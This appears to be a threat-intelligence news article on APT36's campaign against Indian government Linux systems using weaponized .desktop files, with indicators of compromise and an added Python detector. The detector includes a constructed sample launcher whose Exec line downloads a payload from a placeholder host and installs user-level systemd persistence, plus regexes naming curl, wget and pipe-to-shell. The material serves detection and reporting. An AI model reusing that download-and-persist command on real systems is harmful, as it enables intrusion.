
Pakistan-based threat actor APT36, also known as Transparent Tribe, has launched a sophisticated cyber-espionage campaign against Indian government institutions using a newly developed Python-based ELF malware.
The attack marks a significant escalation in the group’s capabilities, demonstrating their growing technical maturity and adaptability to Linux-based operating systems.
The campaign centers on spear-phishing emails containing weaponized Linux shortcut files designed to deceive government employees.
When recipients extract and open these files, the malware silently downloads and executes malicious components in the background while displaying seemingly harmless content to the user.
This dual-layer approach allows the attackers to maintain stealth while establishing persistent access to critical infrastructure. APT36’s shift toward Linux targeting represents a strategic evolution in their operational doctrine.
The group has historically focused on Windows-based attacks, but this new campaign reveals their commitment to targeting the BOSS operating system, which is widely deployed across Indian government agencies.
By adapting their tools to exploit multiple platforms, the threat actors significantly expand their attack surface and operational effectiveness.
Cyfirma security analysts identified the malware after discovering the weaponized .desktop files being distributed through targeted phishing campaigns.
The researchers noted that the infection chain begins with a deceptive archive file containing the malicious shortcut, which triggers a multi-stage payload delivery process.
Once executed, the shortcut downloads a decoy PDF document to distract the user while simultaneously fetching and installing the actual ELF malware payload from attacker-controlled servers.
Malware’s infection mechanism
The malware’s infection mechanism relies on .desktop files as intermediary delivery vectors, allowing the threat actors to conceal their malicious intent while maintaining flexibility in payload deployment.
Unlike directly transmitting ELF binaries, which security systems can more easily detect, .desktop files appear legitimate to Linux users while running embedded commands.
Source code of the bash file (Source – Cyfirma)
This approach enables dynamic payload retrieval and significantly reduces forensic evidence.
Analysis of the extracted malware reveals a feature-rich remote access tool capable of executing arbitrary shell commands, establishing command-and-control communication, capturing screenshots, and exfiltrating data.
The malware uses systemd user-level services to establish persistence, ensuring it continues running across system reboots and user sessions.
Researchers discovered that the threat actor strategically uses the .desktop file format combined with shell script execution to bypass traditional security controls and maintain undetected presence.
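As an added illustration (not code from Cyfirma's report or from the malware itself), the Python triage check below parses a .desktop file and flags the traits described above: an Exec line that fetches from the network, chains into a shell, opens a decoy PDF, or touches user-level systemd units. The two sample entries and the example.invalid URLs are constructed for the demonstration.

```python
import re
from configparser import ConfigParser

# Traits of a downloader-style .desktop launcher, as described in the report:
# network fetch, shell chaining, decoy document, user-level systemd persistence.
SUSPICIOUS = {
    "network_fetch": re.compile(r"\b(curl|wget)\b"),
    "pipe_to_shell": re.compile(r"\|\s*(ba)?sh\b|\b(ba)?sh\s+-c\b"),
    "user_systemd": re.compile(r"systemctl\s+--user|\.config/systemd/user"),
    "decoy_open": re.compile(r"\b(xdg-open|evince|okular)\b.*\.pdf", re.I),
}

def parse_desktop_entry(text):
    """Return the [Desktop Entry] section as a dict, preserving key case."""
    cp = ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str  # keep 'Exec', 'Terminal' etc. as written
    cp.read_string(text)
    return dict(cp["Desktop Entry"]) if cp.has_section("Desktop Entry") else {}

def scan_desktop_entry(text):
    """Return the list of suspicious traits found in a .desktop file's Exec line."""
    entry = parse_desktop_entry(text)
    exec_line = entry.get("Exec", "")
    findings = [name for name, rx in SUSPICIOUS.items() if rx.search(exec_line)]
    # A launcher that downloads something while hiding its terminal is a strong tell.
    if entry.get("Terminal", "").lower() == "false" and "network_fetch" in findings:
        findings.append("hidden_terminal_with_fetch")
    return findings

# Constructed sample mimicking the decoy-PDF-plus-payload pattern (placeholder host).
SAMPLE_MALICIOUS = """[Desktop Entry]
Type=Application
Name=Meeting_Notice.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -fsSL http://example.invalid/d.pdf -o /tmp/d.pdf; xdg-open /tmp/d.pdf; curl -fsSL http://example.invalid/p -o ~/.cache/p; chmod +x ~/.cache/p; systemctl --user enable --now p.service"
"""

# Constructed benign launcher for comparison.
SAMPLE_BENIGN = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Terminal=false
"""

if __name__ == "__main__":
    print("malicious:", scan_desktop_entry(SAMPLE_MALICIOUS))
    print("benign:", scan_desktop_entry(SAMPLE_BENIGN))
```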
The campaign infrastructure uses recently registered domains and compromised servers located in multiple countries.
The malicious domain lionsdenim[.]xyz, registered just 22 days prior, combined with IP address 185.235.137.90 in Frankfurt, facilitates payload delivery.
Indian government agencies should implement immediate mitigation measures, including enhanced email security, endpoint detection and response solutions, and strict application authorization policies to counter this persistent threat.
